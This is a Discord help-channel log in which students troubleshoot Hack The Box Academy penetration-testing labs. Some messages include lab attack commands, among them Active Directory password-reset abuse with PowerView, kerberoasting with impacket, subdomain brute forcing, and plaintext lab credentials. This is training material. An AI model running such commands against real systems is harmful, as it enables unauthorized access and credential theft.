#modules

1 messages · Page 361 of 1

fathom pendant
#

You can ask for help and say "the guide says my command should work, but I'm not getting any results"

#

I'm also assuming you downloaded the footprinting-wordlist.txt to run the command with

dim ridge
#

@green minnow what module and question is this on?

fathom pendant
#

But increasing the wait time -W will yield results

#

As smtp is a generally slow service

#

So between 15-20 second wait time and you'll get it

#

This is advice that's been posted in the channel ad nauseum about that section

green minnow
#

is wait time controlled by -w or -W because if it's -W then the walkthrough text is wrong.

fathom pendant
#

The walkthrough is increasing worker processes

#

But that doesn't make it work better

#

-W is wait time

green minnow
#

"the -w option, which sets the maximum number of seconds for waiting for replies:"

fathom pendant
#

Ah

#

Unless I'm misremembering

#

You can do smtp-user-enum --help

#

To see the flags and stuff to use with it

green minnow
#

I don't think there even is a -W or -w

        With arguments: -m -u -U -s -S -r -t -M -f -D -p```
#

-t n Wait a maximum of n seconds for reply (default: 5)

#

adding -t 20 doesn't actually change the Query timeout ............ 5 secs though

acoustic owl
green minnow
#

I am confused

acoustic owl
#

Are you using the same version? Different version, different arguments...

green minnow
gray yacht
#

Not sure if it's the same module, but for one of them I ended using smtp_enum with metasploit and the provided wordlist. I remember smtp-user-enum not working so I just rolled to something else.

green minnow
#

How can you have two -t options?

green minnow
#

good idea

gray yacht
green minnow
#

is smtp-user-enum.pl somehow different to smtp-user-enum even though they are both v1.2?

#

so pentestmonkey just never fixed this?

fathom pendant
dim ridge
#

learning to check check check everything hehe, the windows machine rdp'ed onto has an american keyboard so the @ symbol was giving me " when entering creds 😆

green minnow
#

Thing is this was fixed by this user in 2017. Why didn't pentestmonkey merge it?

#

Now the smtp-user-enum is working with -w set to 20 seconds.
Christ that took a lot of fixing. And it was apparently already fixed 7 years ago if the pull request was accepted!

acoustic owl
green minnow
#

I'm using Black Arch

#

I'm reaching out to the devs of black arch on github right now to tell them about this

#

I do wonder where Kali and Parrot are getting their version of smtp-user-enum though as the broken version is what's on pentestmonkey's github

#

And also confused as to why both versions have the same version number

acoustic owl
#

No idea. Maybe it was fixed once and then added to the repos of the distros.

fathom pendant
#

I know parrot has the parrotsec gitlab

green minnow
#

Is whoever pentestmonkey is just not active anymore? It's weird not to accept a pull request from 7 years ago that fixes the issue.

acoustic owl
#

These things can happen with any software.

dim ridge
#

When something you've been trying to get working for ages finally does

burnt spruce
#

guys, i have a question. So how do i need to connect via ssh if i have permission denied

ssh sshuser@94.237.61.84 -p 22
The authenticity of host '94.237.61.84 (94.237.61.84)' can't be established.
ED25519 key fingerprint is SHA256:oXRFxErll+5X1LStJh/Fk8UDX7DQf4BhaHCGwGRAQYQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.61.84' (ED25519) to the list of known hosts.
sshuser@94.237.61.84: Permission denied (publickey).

ssh sshuser@94.237.61.84 -p 22
sshuser@94.237.61.84: Permission denied (publickey).

the password is qqww1122, but i cant connect
gray yacht
storm elk
#

If it’s a public ip, you’ll also receive a port

burnt spruce
storm elk
rustic sage
#

I was going through the windows fundamentals module, since it goes so deep I was wondering whether I need to memorise all of commands and stuff or just get an overview?

burnt spruce
#

guys, sup again so

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

so can someone give a hint whats a username

dapper moth
#

For a theoretical test, practical exam, life, the academy modules?

#

Other than those proctored/monitored exams, there isn't any need to memorize anything

foggy monolith
#

This has got to be the only way around slow target XRDP performance that I know of ― and it has the added benefit of all work being saved by default.

This is the Documentation & Reporting Practice Lab for context.

rustic sage
dapper moth
#

What you find important, yes

#

It's always good to have the path you've taken and the commands you used

digital pendant
#

Stuck!

I'm on Module: getting started - Initial Foothold nibbles lab.

I've completed all the tasks (using the MSF module instead of the manual as I couldn't get the below to actually spawn a shell... frustrating!)

(see image 1 and 2)

Theres just no connection coming back - am I missing anything?

#

Forgot to include this. Yes I did upload the shell 😄 no Curling it does not change the outcome.

dapper moth
digital pendant
vivid sigil
#

Hi

Active Directory Enumeration & Attacks > ACL Abuse Tactics

why i got this error, even i copied and plastered directly without changing the command, anyhelp ?

PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> $SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
PS C:\Tools> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
PS C:\Tools> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\Tools> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Get-Domain] Error retrieving the current domain: Exception calling "GetCurrentDomain" with "0" argument(s): "Current security context is not associated with an Active Directory domain or forest."
WARNING: [Get-PrincipalContext] Error creating binding for object ('damundsen') context : Exception calling ".ctor" with "4" argument(s): "The server could not be contacted."

tranquil axle
#

sounds like the domain controller isn't there, it thinks you aren't in a active directory environment

#

maybe reset the target and give it a few minutes to fully start all the services

vivid sigil
#

9min not enough ?:(

rustic sage
#

Hey guys
I'm going insane
This hash is uncrackable
Idk what's wrong I've tried to modify it but hashcat never recognizes it

#

And I can't even paste it bc it's too long

gray yacht
proven loom
#

This is intentional right?
Password Attacks - Network Services

autumn pilot
proven loom
dim ridge
#

whats the question

buoyant escarp
#

just finished the Web-Proxy Module, imo 100 cubes for this quick and easy Module is a big much :/

gray yacht
harsh gorge
#

yeah im having the same issue

#

i got the button enabled but I cant tell if I did it right?

proven loom
# gray yacht Are you using the correct user?

I don't know the user, I'm reusing whatever users I got from brute forcing logins for other protocols. I found 2 more users from SSH but none of the passwords work for either user for RDP

gray yacht
fathom pendant
#

Ligolo isn't a web proxy tool

faint geode
harsh gorge
#

did that but now burp is hanging on the target and im unsure how to set the cookie

fathom pendant
harsh gorge
#

i did that

#

||```
POST /admin.php HTTP/1.1
Host: 94.237.54.240:56708
Content-Length: 21
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://94.237.54.240:56708
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.54.240:56708/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=21pddrkgvdampbnrn506jmevk5; cookie=4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359576f3d
Connection: keep-alive

user=admin&pass=admin

fathom pendant
#

unsure what you mean by its "hanging" ¯_(ツ)_/¯

harsh gorge
#

its 88 characters I dont know what to tell you

fathom pendant
#

¯_(ツ)_/¯

#

I remember unencoding to get to 31 characters if memory and hint serves

#

Then in the payload options there's a section or button "add prefix"

harsh gorge
#

I added the damn prefix

#

still nothing

#

The reponse is legit blank

#

nvm I had to reset the target we good

#

Sorry for being a little rude @fathom pendant

shrewd ore
#

Hey guys, I’m having a little issue: as soon as I enable FoxyProxy and start BurpSuite, the webpage I’m trying to load won’t work anymore. Any idea why this might be happening?

storm elk
#

Is intercept request turned on?

#

You can see in the Proxy tab

shrewd ore
#

yeah

#

I also checked configuration

strange needle
#

Do you fix the certificate in the burp?

shrewd ore
#

yeah i downloaded and installed it in the browser

#

but it should work by default, as its pre configured and installed by HTB

strange needle
#

hmmm

shrewd ore
#

I didnt really change anything, I start the browser, turn on foxy proxy and start burp suite. Max I can get is the GET request, but then the site won't load

cloud urchin
#

have you tried just using the built in browser with burp

shrewd ore
#

yeah

cloud urchin
#

can you reach the site normally in a browser

shrewd ore
#

I think I got it.

fathom pendant
#

Or w/e it is that catches requests :3

shrewd ore
#

I didnt forward the request

#

my bad..but thanks

iron patio
#

this feels like a dumb question, but im on the FTP page in Footprinting and this FTP server seems basically nonfunctional

#

like, ls doesnt work lmao

agile torrent
#

wdym doesn't work?

#

no output, error?

iron patio
#

well I tried dir just now and got a 200 PORT command successful, then it just hangs

#

ill reset and see if that changes anything

#

yeah, same thing

#

it's not a big deal, they might just be using some crappy FTP software, but I want to get this damn flag anyway

#

I also tried using the wget trick they show you to just grab all the files, but that also errored out

#

yeah the ls command hangs for like a minute then prints 425 Unable to build data connection: Connection timed out

agile torrent
#

just to be absolutely certain, you're connected to the vpn?

iron patio
#

yeah, I even redownloaded

#

ill also do that again. why not

agile torrent
#

if you go ps -aux | grep openvpn, how many instances do you have running?

iron patio
#

oh shit, there's three. didnt realize that could even happen

agile torrent
#

thats chill, sudo killall openvpn and restart the connection

iron patio
#

actually it looks like openvpn just uses three processes? like I killed it, started it up again, checked and theres three again

agile torrent
#

oh mb

#

if you ping the target machine, it pings back?

dim ridge
#

IMAP sessions as far as I’ve had them aren’t straightforward like ls cd etc, if you do a search for IMAP cheat sheet on google you should get the commands you need @iron patio

iron patio
#

yeah it pings

iron patio
#

the help command worked and it listed ls and dir as valid commands

dim ridge
#

Haha sorry I misread

#

🤦‍♂️

iron patio
#

np

#

maybe they just throttle the docker containers for these modules, so it's just too slow

#

that's my guess

worn matrix
#

How would you mitigate insecure deseralization with pickle module ?

mellow pewter
#

For Nmap NSE module i am submitting the correct flag but it doesn’t accepts

burnt spruce
#

from HTB to 3r}

#

not everything

cloud urchin
mellow pewter
#

Oh my bad

#

Also i was submitting the other flag.

acoustic thorn
#

Does anyone know why someone might choose to use rpivot as opposed to dynamic port forwarding? Having some trouble wrapping my head around this

burnt spruce
#

Can someone give hint about username , its hard to wait 60 hours

Login Brute Forcing
Skills Assessment Part 1

What is the password for the basic auth login?,

acoustic thorn
burnt spruce
#

yep

acoustic thorn
#

I'm surprised then that none of them seem to be working for you

burnt spruce
acoustic thorn
upper ruin
#

Yo guys I have a question about linux privilege escalation. I am the Path Abuse section and I found the answer.

#

Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?

#

My question is:

burnt spruce
#

Login Brute Forcing

upper ruin
#

u got a question about skill assessement 1 on login brute forcing?

#

I can help

acoustic thorn
fathom pendant
gray yacht
burnt spruce
#

HOWWWW

gray yacht
#

Just using the content from that section.

upper ruin
#

ever tried bruteforcing the login?

upper ruin
#

It fits the question.

gray yacht
acoustic thorn
upper ruin
#

Mm, ima check it out, it just seems illogical for games to be part of the PATH.

#

Got 3 more modules left, Windows priv esc, documentation and attacking enterprise networks.

acoustic thorn
upper ruin
#

or a general question

acoustic thorn
#

pivoting, Web Server Pivoting with Rpivot

#

Just not really understanding the partical use of reverse proxies in general ig

upper ruin
#

dm me

cloud urchin
fallow kernel
#

Hello guys, I am stuck at the Shells & Payloads module with The Live Engagement at the following exercise:

**What language is the shell written in that gets uploaded when using the 50064.rb exploit? **

So I thought this would be easy since they posted about this 50064 exploit on the blog, so I tried to import it into msfconsole and run it. But it said:

[] Got CSRF token:
[
] Logging into the blog...
[-] Login failed! Status code 404
[-] Exploit aborted due to failure: unexpected-reply: 172.16.1.12:80 - Authentication Failed
[*] Exploit completed, but no session was created.

Which is strange since I give it the right credentials (found at the desktop and in the hint)
So next I tried to manually exploit it so I looked at what the exploit was doing and found out it is uploading a php shell with a png header to a specific endpoint. I managed to upload a php reverse shell crafted with msfvenom and gave it a png header but when I then navigate to the directory where it should be stored, I won't get a shell back but just get the content of the payload as output.

Is there anyone who can help me with fixing the msfconsole or with fixing the payload to get interpreted correctly?

harsh gorge
#

what did you mean by this

fathom pendant
harsh gorge
#

I tried subdomain enum

fathom pendant
fathom pendant
harsh gorge
#

|| gobuster vhost -u http://inlanefreight.htb:34651 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain||

fathom pendant
#

try adding --domain inlanefreight.htb

#

i'm assuming as well you added inlanefreight.htb to your hosts file

fallow kernel
harsh gorge
#

yup sure did

fathom pendant
#

how did you add it?
ip inlanefreight.htb
?

harsh gorge
#

yes

fathom pendant
#

[do not put port in the hosts file]

#

(covering bases

harsh gorge
#

i didnt do that lel

fallow kernel
gray yacht
fallow kernel
#

Yeah I got the answer that way hahaha but for the next one I need to get the flag on the host so I’ll need to get a shell

sacred gull
#

CLM bypass killing me

#

Like apparently it 'doesn't work' or something??

#

Paths are different because applocker

reef fox
#

Hi?

proper hare
#

why i can not go into the modules?

cloud urchin
#

what do you mean?

proper hare
#

this is what i mean

polar parcel
#

Bump. Can anyone please help me with this?

cloud urchin
proper hare
#

hmm, that's weird

cloud urchin
#

maybe disable add-ons

proper hare
#

same issue i logged in using the private browser

full echo
#

You can DM me.

harsh gorge
#

||im not tripping am I? i found the path http://faculty.academy.htb:40654/courses/***-***.php7 that should be it in refrence to the third question ||

olive slate
fathom pendant
harsh gorge
fathom pendant
#

:)

harsh gorge
#

I GOT IT RIGHT😭

fathom pendant
harsh gorge
wooden seal
#

can i complete all three job role paths? or i can only pursue and complete any one of them (with silver annual) ik its written still i am confused

waxen totem
smoky stream
#

sqlmap essentials - Tried using every --tamper in the list, using -r req.txt with request copied from burp (axxxxx.php POST with JSON parameter)
I added --random-agent, --chunked
used --batch and restricted the techinques to BEU to skip the positive answer of time-based
I clearly cannot understand what I am doing wrong 😑
any other advices? hints?

pliant coyote
#

Why can't it bounce back?

humble ravine
#

Hello there, can anyone help me out with "Windows Attack & Defence" module?

Stuck at Print Spooler & NTLM Relaying section

surreal marsh
#

Hi

I'm on Windows Privesc " + 0 Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user. "

  • cannot put anything on the "De^#!@ Sh@!#" access denied both on Pub and Priv (I'm logging as htb-student via smbclient)
  • putting links on FS01 didn't sparked any interaction from sccm_svc user

Any hint please?

unique ether
#

Try diff region maybe pwnbox is bugged

unique fog
#

hi for Initial Enumeration of the Domain under Active Directory Enumeration & Attacks, I can't seem to xfreerdp into the machine. I can only do that using -X parameter when i do ssh

ssh -X htb-student@10.129.125.159
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.51.131

The system becomes very laggy after this. I am getting an error 'ERROR][com.freerdp.client.x11] - failed to open display:' if i don't set -X

hasty mauve
#

In the File inclusion module, in the skill assessment.
I don't have read access to /var/log/nginx/access.log, but a writeup online had read access to it.
how is this possible?

buoyant escarp
#

maybe they fixed an unintended way

hasty mauve
#

it was giving me error 500 before.

buoyant escarp
#

ah okay, sometimes thos machines are buggy

hasty mauve
#

yep lol

surreal marsh
#

Might help someone save time 😉

# Define the network share path
$sharePath = "\\Path\To\the share"

# Get all subfolders in the share
$subfolders = Get-ChildItem -Path $sharePath -Directory -Recurse

# Check each subfolder for write access
foreach ($folder in $subfolders) {
    $testFile = Join-Path -Path $folder.FullName -ChildPath "WriteTest.tmp"

    try {
        # Attempt to create a temporary file
        New-Item -Path $testFile -ItemType File -Force -ErrorAction Stop | Out-Null

        # If successful, output the writable folder
        Write-Host "Writable: $($folder.FullName)" -ForegroundColor Green

        # Clean up the test file
        Remove-Item -Path $testFile -Force -ErrorAction Stop
    } catch {
        # If an error occurs, it means the folder is not writable
        Write-Host "Not Writable: $($folder.FullName)" -ForegroundColor Red
    }
}
chrome furnace
#

After doing git clone https://gitlab.com/cryptsetup/cryptsetup.git How do I run it? There is no cryptsetup executable file, only the cryptsetup directory

thin citrus
#

Can someone DM me and explain 'dynamic front-end validation filters' in ''Code Review - Validation Logic Disparity' with a screenshots where to look for 'dynamic front-end validation filters'.

astral ravine
#

If I cancel htb academy subscription in the middle of a month. Will I get those days back after regaining the subscription (?)

limber river
astral ravine
storm elk
#

It does not work like that

#

if you cancel your subscription, the current days will not stop being consumed

limber river
storm elk
#

IT will just not renew at the end

#

you can't pause it

astral ravine
#

ahhh, okay

torn skiff
#

in windows attack and defense kerberoasting the dictionary file 'passwords.txt' does not exist. I am stuck here

ancient niche
#

Hello everyone. I can't find this answers. This is File inclusion Submit the contents of the flag.txt file located in the /usr/share/flags directory.

crisp solstice
zenith swallow
#

Hello there for skills assessment in sqlmap, I managed to obtain the flag but it has a typo?

zenith swallow
#

yea like yknow the flags are formatted as HTB{} right? But for some reason the sqlmap returns something like QTB{} or HYB{}

#

yea

#

kinda weird tbh

#

i meant its not working* lol misread your message

runic depot
#

folks anyone done the malicious document analysis can help me to get peepdf working

wild sage
#

So I'm doing the Password Mutations section in the Password Attacks module. I'm using Hydra, but obviously SSH limits how many tasks can be performed. Is there a faster way or just suck up the wait time with Hydra, I know it's powerful and I tried netexec (crackmapexec) and msfconsole. However, they take just as long if not longer.

gaunt temple
#

module: MSSQL, Exchange, and SCCM Attacks
section: Introduction to MSSQL Server

I cant connect to the sql server with the supplied creds.
I rdp into the machine as the "student" user, but then it is impossible to connect to the server

#

has anyone come across this?

crisp solstice
dapper moth
ancient niche
#

someone can help me pls?

storm elk
ancient niche
# storm elk With what?

i can't find this Submit the contens of the flag.txt file located in the /usr/share/flags directory

storm elk
#

What module and section?

ancient niche
#

File inclusion

#

😦

storm elk
#

Section?

ancient niche
#

first

storm elk
#

What’ve you tried? Dm me

tranquil axle
sullen schooner
#

hello, I'm in the "linux fundamentals" module and I got this question

Use CURL from your Pwnbox (not the target machine) to obtain the source code of the

"https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.```
i don't know how to answer it, no idea
dusty cape
#

Hi I've a problem with Dynamic Port Forwarding. I added Port 9050 to proxychains4.conf and connected to my target with ssh -D, basically like the module explains. However instead of getting:

ProxyChains-3.1 (http://proxychains.sf.net)
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 21 21:49:47 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.8.3

<SNIP>

I'm getting:

[proxychains] DLL init: proxychains-ng 4.17
ERROR: nmblookup is not in your path.  Check that samba package is installed
ERROR: net is not in your path.  Check that samba package is installed
ERROR: rpcclient is not in your path.  Check that samba package is installed
ERROR: smbclient is not in your path.  Check that samba package is installed
WARNING: polenum is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
For Gentoo, you need to install the "samba" package
For Debian, you need to install the "smbclient" package
#

I'm able to run enum4linux without proxychains

dusty cape
sullen schooner
dusty cape
sullen schooner
flat patrol
#

still stuck +2 more hours this morning, no email addy even. Last 3 Q's are killing me. Information Gathering - Web Edition final assessment.

sullen schooner
dusty cape
#

I already have, like I said enum4linux runs perfectly fine without proxychains

burnt flax
#

Hey guys I logged in today and found all my completed modules gone. Is there a way I can get these back???

compact patrolBOT
burnt flax
storm elk
#

🤞

ancient niche
#

I can't find the File the flag.txt of File inlucusion. Someone can help me?

buoyant escarp
#

the SQLMAP Essentials module is so great

placid edge
#

Anyone here done the "Password Reset Poisoning" from "Abusing HTTP Misconfigurations". Tried using all sorts of headers as you can see in the response of the intercept server:

Host: interactsh.local:40167
X-Forwarded-Server: interactsh.local:40167, interactsh.local
X-Forwarded-Host: interactsh.local:40167, interactsh.local:40167
X-Forwarded-For: interactsh.local:40167, 10.30.18.252
X-Host: interactsh.local:40167

However the password reset token is never given to me.

(edit: gotit)

dusty cape
upper ruin
#

Yo can you tell me how you fixed it?

#

Same issue here.

#

nvm got it

bitter silo
#

Hello. I'm having a problem with the Windows Fundamentals first challenge. I've gotten the RDP connection to work and it's telling me to figure out the build number and windows version using the get-wmiobject, but no matter how I type it into Powershell, it keeps telling me it's not a valid command. I've tried several different combinations of typing this in and have not gotten anything involving Get-Wmiobject to be recognized.

wild sage
dark hedge
bitter silo
dark hedge
#

another window should appear with Windows in it if you RDP, you may have accidentally clicked off it

bitter silo
#

I very well might have. I'll just try again later. Thanks for the help!

safe star
dim ridge
#

did anyone else find the foothold machine DEAD SLOW on pivoting skills assessment

#

keep having to reset the target because it completely freezes up

#

nah this is unusable 😦

fickle thicket
#

Anyone has any hint for introduction to nosql injection skills assessment 2? Kind of stuck at the forget password page

safe star
#

You could probably use nxc to execute commands remotely

safe star
small igloo
#

Is anyone else having some serious trouble answering these basic questions on the linux fundamentals? I am putting in what I think are the right answers but the right answers seem to be totally off. For example the very first question about the machine hardware name? x86_64 is apparently the right answer? In what world is that the name of the machine. The questions feel extremely misleading.

dim ridge
#

Nxc? That’s a new one for me

small igloo
#

Same with answering the MTU question and the kernel. I'm still stuck on those even though I'm putting in exactly what it wants. MTU of 1500 is the tun0. But this isn't right? I even tried ens3 and still wrong. I'm pulling my hair out for these basic questions that I know the answer to but HTB says is wrong.

dim ridge
#

Ah netexec

small igloo
#

I did exactly that. Still wrong.

#

Yep. I'm logged in.

#

For which question? I am having trouble with three of them. kernel version, MTU question, and mail question.

#

Kernel version is 6.5.0

#

Weird. I'll try I suppose. I only have one machine spawn a day though. Any insight for the MTU question? Pretty sure that was correct as well. And the mail question I justed did echo $MAIL and that was wrong too.

#

I dunno. I don't want to give up on this but it's frustrating.

#

Was I on the wrong machine??

dark hedge
#

you have to be SSHed into the target machine

small igloo
#

I do. Thank you so much. You've been patient and very helpful.

sacred gull
#

This has happened for both Static and CLM, the only sections I cant pass are the ones where they do a "check" to generate a flag

crystal shoal
#

ls

rustic sage
#

Hey guys
Ad module - skill assessment part 2 - Q7
I can login to the sql server but it's not very useful.
When I try to use xp_cmdshell on other directories I always always get error 5 access denied
Also tried to create another user and give him xp_cmdshell permissions but I also get error 5.
When I tried to use revshell.com it says "write to the server failed"
I tried to use loads of different metasploit modules and not one connects back to give me a meterpreter, I tried this both while pivoting and without and it never connects back but I can login to the sql server with user n*****

glacial minnow
#

Help, im trying to connect to a linux host from DCsync section, but i keep getting errors, this image is where i tried to directly rdp into that machine, the other time when i tried to ssh from windows i got faced with a premission denied error

analog dock
#

<@&861185840277487616>

glacial minnow
glacial minnow
#

bruh so am i stuck for like forever?

#

can somone check please?

#

i rdped into the machien from Windows, but i got the same login screen with the same error, so i cant access both IPs, only 10.129.72.94 is accessable

analog dock
#

<@&861185840277487616>

terse quiver
#

is it normal to not be able to ping a htb's machine from pwnbox? I can't do it in the Windows fund module

thorn urchin
#

Windows doesnt respond to pings by default

terse quiver
void peak
#

why? xd

dark hedge
lusty thicket
sacred gull
unreal whale
#

Hey guys! I'm new here and to HTB, so I would like some advise on few modules for Penetration Testing path. I'm currently enrolled in the Penetration Testing path and going through the academy module layout I have see a few modules that are "general" I have already completed the "Learning Process", "Linux Fundamentals", and "Windows Fundamentals". For the "Introduction To Network" I already know about networks so I skip over that one while I'm currently learning about web requests on my own before seeing it on HTB, but for "Introduction To Web Requests", "JavaScript Deobfuscation", and "Introduction Of Active Directory" I don't know much about. With all of that, I would like to know which I should do first before going deep into the Penetration Testing path.

waxen totem
unreal whale
#

Okay, I will do that. Thanks for replying!

cerulean hinge
foggy monolith
unreal whale
unique fog
lusty thicket
#

when you use ssh -X you're asking a protocol that was designed for text and light file transfer to do this work of handling a full blown gui

#

and then you're surprised when it gets sluggish

unique fog
#

i get the error when I xfreerdp..

lusty thicket
unique fog
lusty thicket
#

one would think the pivoting and forwarding module was listed as a prerequisite

unique fog
main bloom
#

Hello everyone. On the module 'File transferts' section 'living off the land' the upload with certreq was impossible. Do you have tips for me? Have a nice day

main bloom
#

Yes

rustic sage
harsh gorge
#

Anyone else stuck on XSS: Phishing

#

I keep trying to put the payload in but it keeps throwing me invalid url

unique ether
#

Like where u stuck

rustic sage
#

Hello

#

For the next 5 minutes I can help somebody who is doing cpts path

#

And is before the end of ad attack assessment

#

I am about to become the master

real delta
#

nm, it's a module not the test

main bloom
unique ether
#

u need to update it

#

the here is in ur module

#

i remember having to update it

sullen schooner
#

this is my problem, still stuck with it

waxen totem
#

ehe use grep and sort and stuff to filter out links

sullen schooner
waxen totem
#

This is the regex version cos I can't type out the intended for the life of me can't remember it

curl https://www.inlanefreight.com > inlanefreight.txt && cat inlanefreight.txt | grep -Ro "https://www.inlanefreight.com[^'\"]*" | sort -u | wc
sullen schooner
#

and what does "unique paths" even mean

waxen totem
sullen schooner
#

oh ok

waxen totem
#

study the command I sent

sullen schooner
#

it shows 96

waxen totem
#

I prollyy did something wrong

sullen schooner
#

-_-

#

this is my 3rd day in the same problem

waxen totem
#

it's almost correct ig

wanton vault
#

Can anyone assist me with Windows Attack and Defense? I am confused on the password.txt file with in the section Keberoast. I was able to move the file over from the windows machine using the SMB client. Closed the RDP and now I am lost.

digital pendant
#

Ironically this does count a duplicate twice and misses out one unique domain but you get to the same answer kek

analog dock
wanton vault
#

Come on hack the box, I get it this is suppose to be learning and we are suppose to teach our selves but man I gotta jump 10 sections to use the kali target just to finish the first section of Windows Attack and Defense. Come on man. 10 hours of wasted time and that all I had to do. WOW just wow

pliant coyote
#

──╼ $sudo proxychains GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies

Password:
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation


acmetesting/LEGIT ttimmons 2022-06-01 13:32:18.194423 <never>

[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

steady jungle
#

Hi guys i am new around here so i am please to meet you all!

storm elk
torn skiff
digital pendant
#

are there any plans to update crackmapexec module thats tier 3? seems as most probably know by now that the team moved under a different project due to hostile takeover issues in the repo

rose hull
#

Anyways I don't understand why is this happening.. Is it a working as desired bug?

┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos system
system: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos information
information: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos kernel
kernel: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos
apropos what?
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos apropos
apropos: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos ping
ping: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ 

@storm elk

storm elk
#

apropos system is working for me on my pwnbox

#

but i am on eu-academy-3 , let me switch to 1

rose hull
#

Yeah I just ran sudo mandb then the command is working

#

It's not initialized by default?

storm elk
#

I just spawned a system

#

and worked out of the box

rose hull
storm elk
#

could be

dark hedge
#

if the questions ask you to RDP into WS001, then you aren't meant to SSH to the Kali box

#

only when it asks you to RDP/SSH to Kali should you do so

empty trout
#

in the module shells and payloads in the section infiltrating windows they are using a metasploit exploit windows/smb/ms17_010_psexec and we got the same machine for answering the questions . but when i am trying the same exploit it is not working

#

i tried windows/smb/ms17_010_eternalblue

#

too

#

i can use psexec to get the shell but it needs creds and they didnt gave any ...

#

????

high stream
#

did you find the issue i'm in the same page

orchid scaffold
#

hello why doesnot my ping {target_IP} work? in parrot terminal

empty trout
#

are u connected to the vpn

orchid scaffold
empty trout
#

once downlaoded execute this command sudo openvpn <file-u-downloaded>

orchid scaffold
#

that has been downloaded in my computer how to send it in parrot os @empty trout

empty trout
#

use python3 http.server to downlaod that to your parrot

#

seach online how to transfer file with python http.server

rustic sage
#

dir

thin citrus
#

Can someone DM me and explain 'dynamic front-end validation filters' in ''Code Review - Validation Logic Disparity' with a screenshots where to look for 'dynamic front-end validation filters'.

lost scroll
#

Hello,
I'm stuck on question 2 of Intrusion Detection With Zeek in Working with IDS/IPS
I've used || tshark -r revilkaseya.pcap -q -z io,stat,0,"ip.src==A && ip.dst==B" with A the only ip I found in conversation in wireshark and B the given ip || but I can't get the good answer with that and I don't understand why... Could i discuss about it with someone ?

gilded rune
#

Pls I need help with this challenge on Linux commands. I was asked to find the config file that has been created after 2020-03-03 with size smaller than 28k and larger than 25k. I ran this command but got nothing on the terminal

find . -iname "*.config" -type f -newermt 2020-03-03 -size -28k -size +25k

urban elk
#

I haven't done this module but config files on linux tend to be .conf

#

other than that, check that your current working directory is a good place to start, since you ran find .

gilded rune
#

Ok, lemme try this

#

Still didn't work 😩

gilded rune
urban elk
#

low, but you can always reset the machine

rustic sage
#

Cannot find pathNo hashes loaded.

terse tapir
#

hey guys I am on the CPTS Footprinting Lab - Medium and I want to understand if we can use exploits here or that was not possible only for the EASY one. Thanks.. 🙂

flat patrol
#

I am still stuck in this module's pit. I wouldn't be able to answer the last three questions of the skills assessment if my life depended on it. I have easily invested 12 hours in that and I go over the module again, and the cheat sheet, and try everything and anything I can... fail. 😢 If someone is reading this who has gotten the last 3 questions, please DM me and give me a clue as to where to go because everything I tried has been a dead end. I totally found the email address too, but it's not the right one. Gaaaaaaaaaaaaaaaaaaaaaaaaaaaaaah!!!!!

gilded rune
#

Even the next question after it, it asked to find the number of files with .bak extension

It returned 1 file but the answer seems incorrect 😩

